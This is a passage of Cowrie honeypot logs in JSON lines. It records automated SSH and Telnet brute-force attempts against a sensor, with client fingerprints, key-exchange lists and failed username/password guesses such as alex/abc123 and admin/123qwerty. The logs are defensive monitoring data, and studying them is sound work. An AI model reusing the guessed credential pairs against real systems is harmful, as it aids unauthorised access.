0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T21:39:12.012738Z","src_ip":"212.227.125.160","session":"215706e784b9"}
{"eventid":"cowrie.login.failed","username":"liberty-bridge","password":"liberty-bridge","message":"login attempt [liberty-bridge/liberty-bridge] failed","sensor":"my-vps","timestamp":"2025-08-26T21:39:12.146885Z","src_ip":"212.227.125.160","session":"215706e784b9"}
{"eventid":"cowrie.session.closed","duration":"1.4","message":"Connection lost after 1.4 seconds","sensor":"my-vps","timestamp":"2025-08-26T21:39:13.319582Z","src_ip":"212.227.125.160","session":"215706e784b9"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":51112,"dst_ip":"1.2.3.4","dst_port":22,"session":"546b638e51a0","protocol":"ssh","message":"New connection: 212.227.125.160:51112 (1.2.3.4:22) [session: 546b638e51a0]","sensor":"my-vps","timestamp":"2025-08-26T21:39:17.506758Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T21:39:17.511375Z","src_ip":"212.227.125.160","session":"546b638e51a0"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T21:39:17.555392Z","src_ip":"212.227.125.160","session":"546b638e51a0"}
{"eventid":"cowrie.login.failed","username":"niaoyun","password":"123456","message":"login attempt [niaoyun/123456] failed","sensor":"my-vps","timestamp":"2025-08-26T21:39:17.737324Z","src_ip":"212.227.125.160","session":"546b638e51a0"}
{"eventid":"cowrie.session.closed","duration":"1.3","message":"Connection lost after 1.3 seconds","sensor":"my-vps","timestamp":"2025-08-26T21:39:18.788176Z","src_ip":"212.227.125.160","session":"546b638e51a0"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":38805,"dst_ip":"1.2.3.4","dst_port":23,"session":"775e2cdd69f5","protocol":"telnet","message":"New connection: 212.227.125.160:38805 (1.2.3.4:23) [session: 775e2cdd69f5]","sensor":"my-vps","timestamp":"2025-08-26T21:39:21.012043Z"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":46498,"dst_ip":"1.2.3.4","dst_port":22,"session":"2cc0a0e8acc0","protocol":"ssh","message":"New connection: 212.227.125.160:46498 (1.2.3.4:22) [session: 2cc0a0e8acc0]","sensor":"my-vps","timestamp":"2025-08-26T21:39:22.942272Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T21:39:22.987311Z","src_ip":"212.227.125.160","session":"2cc0a0e8acc0"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T21:39:22.988023Z","src_ip":"212.227.125.160","session":"2cc0a0e8acc0"}
{"eventid":"cowrie.login.failed","username":"elsearch","password":"elsearch","message":"login attempt [elsearch/elsearch] failed","sensor":"my-vps","timestamp":"2025-08-26T21:39:23.236265Z","src_ip":"212.227.125.160","session":"2cc0a0e8acc0"}
{"eventid":"cowrie.session.closed","duration":"1.3","message":"Connection lost after 1.3 seconds","sensor":"my-vps","timestamp":"2025-08-26T21:39:24.283325Z","src_ip":"212.227.125.160","session":"2cc0a0e8acc0"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":41884,"dst_ip":"1.2.3.4","dst_port":22,"session":"da6b110f43d3","protocol":"ssh","message":"New connection: 212.227.125.160:41884 (1.2.3.4:22) [session: da6b110f43d3]","sensor":"my-vps","timestamp":"2025-08-26T21:39:28.333687Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T21:39:28.449297Z","src_ip":"212.227.125.160","session":"da6b110f43d3"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T21:39:28.450006Z","src_ip":"212.227.125.160","session":"da6b110f43d3"}
{"eventid":"cowrie.login.failed","username":"potok","password":"potok","message":"login attempt [potok/potok] failed","sensor":"my-vps","timestamp":"2025-08-26T21:39:28.668077Z","src_ip":"212.227.125.160","session":"da6b110f43d3"}
{"eventid":"cowrie.session.closed","duration":"1.4","message":"Connection lost after 1.4 seconds","sensor":"my-vps","timestamp":"2025-08-26T21:39:29.716969Z","src_ip":"212.227.125.160","session":"da6b110f43d3"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":62790,"dst_ip":"1.2.3.4","dst_port":22,"session":"8665434b35cf","protocol":"ssh","message":"New connection: 212.227.235.229:62790 (1.2.3.4:22) [session: 8665434b35cf]","sensor":"my-vps","timestamp":"2025-08-26T21:39:30.653097Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.9.0","message":"Remote SSH version: SSH-2.0-libssh2_1.9.0","sensor":"my-vps","timestamp":"2025-08-26T21:39:30.659383Z","src_ip":"212.227.235.229","session":"8665434b35cf"}
{"eventid":"cowrie.client.kex","hassh":"57446c12547a668110aa237e5965e374","hasshAlgorithms":"ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,curve25519-sha256,curve25519-sha256@libssh.org,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1;aes128-ctr,aes192-ctr,aes256-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","curve25519-sha256","curve25519-sha256@libssh.org","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519","ssh-rsa","ssh-dss"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57446c12547a668110aa237e5965e374","sensor":"my-vps","timestamp":"2025-08-26T21:39:30.783325Z","src_ip":"212.227.235.229","session":"8665434b35cf"}
{"eventid":"cowrie.login.failed","username":"alex","password":"alex","message":"login attempt [alex/alex] failed","sensor":"my-vps","timestamp":"2025-08-26T21:39:31.324005Z","src_ip":"212.227.235.229","session":"8665434b35cf"}
{"eventid":"cowrie.login.failed","username":"alex","password":"abc123","message":"login attempt [alex/abc123] failed","sensor":"my-vps","timestamp":"2025-08-26T21:39:32.451588Z","src_ip":"212.227.235.229","session":"8665434b35cf"}
{"eventid":"cowrie.session.closed","duration":12.457190990447998,"message":"Connection lost after 12 seconds","sensor":"my-vps","timestamp":"2025-08-26T21:39:33.469164Z","src_ip":"212.227.125.160","session":"775e2cdd69f5"}
{"eventid":"cowrie.login.failed","username":"alex","password":"abcd123","message":"login attempt [alex/abcd123] failed","sensor":"my-vps","timestamp":"2025-08-26T21:39:33.578572Z","src_ip":"212.227.235.229","session":"8665434b35cf"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":37270,"dst_ip":"1.2.3.4","dst_port":22,"session":"9f95e336e97d","protocol":"ssh","message":"New connection: 212.227.125.160:37270 (1.2.3.4:22) [session: 9f95e336e97d]","sensor":"my-vps","timestamp":"2025-08-26T21:39:33.717961Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T21:39:33.719030Z","src_ip":"212.227.125.160","session":"9f95e336e97d"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T21:39:33.769065Z","src_ip":"212.227.125.160","session":"9f95e336e97d"}
{"eventid":"cowrie.login.failed","username":"test1","password":"test1","message":"login attempt [test1/test1] failed","sensor":"my-vps","timestamp":"2025-08-26T21:39:33.925148Z","src_ip":"212.227.125.160","session":"9f95e336e97d"}
{"eventid":"cowrie.login.failed","username":"alex","password":"abcd1234","message":"login attempt [alex/abcd1234] failed","sensor":"my-vps","timestamp":"2025-08-26T21:39:34.705099Z","src_ip":"212.227.235.229","session":"8665434b35cf"}
{"eventid":"cowrie.session.closed","duration":"1.3","message":"Connection lost after 1.3 seconds","sensor":"my-vps","timestamp":"2025-08-26T21:39:34.992486Z","src_ip":"212.227.125.160","session":"9f95e336e97d"}
{"eventid":"cowrie.login.failed","username":"alex","password":"abc1234","message":"login attempt [alex/abc1234] failed","sensor":"my-vps","timestamp":"2025-08-26T21:39:35.831294Z","src_ip":"212.227.235.229","session":"8665434b35cf"}
{"eventid":"cowrie.session.closed","duration":"6.3","message":"Connection lost after 6.3 seconds","sensor":"my-vps","timestamp":"2025-08-26T21:39:36.959840Z","src_ip":"212.227.235.229","session":"8665434b35cf"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":60892,"dst_ip":"1.2.3.4","dst_port":22,"session":"14d0d95d45b5","protocol":"ssh","message":"New connection: 212.227.125.160:60892 (1.2.3.4:22) [session: 14d0d95d45b5]","sensor":"my-vps","timestamp":"2025-08-26T21:39:39.140263Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T21:39:39.140938Z","src_ip":"212.227.125.160","session":"14d0d95d45b5"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T21:39:39.200339Z","src_ip":"212.227.125.160","session":"14d0d95d45b5"}
{"eventid":"cowrie.login.failed","username":"spamfilter","password":"spamfilter","message":"login attempt [spamfilter/spamfilter] failed","sensor":"my-vps","timestamp":"2025-08-26T21:39:39.663230Z","src_ip":"212.227.125.160","session":"14d0d95d45b5"}
{"eventid":"cowrie.session.closed","duration":"1.9","message":"Connection lost after 1.9 seconds","sensor":"my-vps","timestamp":"2025-08-26T21:39:41.029842Z","src_ip":"212.227.125.160","session":"14d0d95d45b5"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":51556,"dst_ip":"1.2.3.4","dst_port":22,"session":"09c3eff33c41","protocol":"ssh","message":"New connection: 212.227.235.229:51556 (1.2.3.4:22) [session: 09c3eff33c41]","sensor":"my-vps","timestamp":"2025-08-26T21:39:42.528891Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T21:39:43.679212Z","src_ip":"212.227.235.229","session":"09c3eff33c41"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-26T21:39:43.680025Z","src_ip":"212.227.235.229","session":"09c3eff33c41"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":56278,"dst_ip":"1.2.3.4","dst_port":22,"session":"b3a39698ce29","protocol":"ssh","message":"New connection: 212.227.125.160:56278 (1.2.3.4:22) [session: b3a39698ce29]","sensor":"my-vps","timestamp":"2025-08-26T21:39:45.473287Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T21:39:45.473963Z","src_ip":"212.227.125.160","session":"b3a39698ce29"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T21:39:45.518880Z","src_ip":"212.227.125.160","session":"b3a39698ce29"}
{"eventid":"cowrie.login.failed","username":"debian","password":"123456","message":"login attempt [debian/123456] failed","sensor":"my-vps","timestamp":"2025-08-26T21:39:45.664637Z","src_ip":"212.227.125.160","session":"b3a39698ce29"}
{"eventid":"cowrie.session.closed","duration":"1.2","message":"Connection lost after 1.2 seconds","sensor":"my-vps","timestamp":"2025-08-26T21:39:46.712187Z","src_ip":"212.227.125.160","session":"b3a39698ce29"}
{"eventid":"cowrie.login.failed","username":"admin","password":"123qwerty","message":"login attempt [admin/123qwerty] failed","sensor":"my-vps","timestamp":"2025-08-26T21:39:48.157947Z","src_ip":"212.227.235.229","session":"09c3eff33c41"}
{"eventid":"cowrie.session.closed","duration":"7.6","message":"Connection lost after 7.6 seconds","sensor":"my-vps","timestamp":"2025-08-26T21:39:50.094644Z","src_ip":"212.227.235.229","session":"09c3eff33c41"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":51668,"dst_ip":"1.2.3.4","dst_port":22,"session":"ba3632263378","protocol":"ssh","message":"New connection: 212.227.125.160:51668 (1.2.3.4:22) [session: ba3632263378]","sensor":"my-vps","timestamp":"2025-08-26T21:39:51.050413Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T21:39:51.062419Z","src_ip":"212.227.125.160","session":"ba3632263378"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T21:39:51.096459Z","src_ip":"212.227.125.160","session":"ba3632263378"}
{"eventid":"cowrie.login.failed","username":"git","password":"123456","message":"login attempt [git/123456] failed","sensor":"my-vps","timestamp":"2025-08-26T21:39:51.301655Z","src_ip":"212.227.125.160","session":"ba3632263378"}
{"eventid":"cowrie.session.closed","duration":"1.3","message":"Connection lost after 1.3 seconds","sensor":"my-vps","timestamp":"2025-08-26T21:39:52.348717Z","src_ip":"212.227.125.160","session":"ba3632263378"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":47056,"dst_ip":"1.2.3.4","dst_port":22,"session":"9561d0b75a85","protocol":"ssh","message":"New connection: 212.227.125.160:47056 (1.2.3.4:22) [session: 9561d0b75a85]","sensor":"my-vps","timestamp":"2025-08-26T21:39:56.175632Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T21:39:56.177075Z","src_ip":"212.227.125.160","session":"9561d0b75a85"}
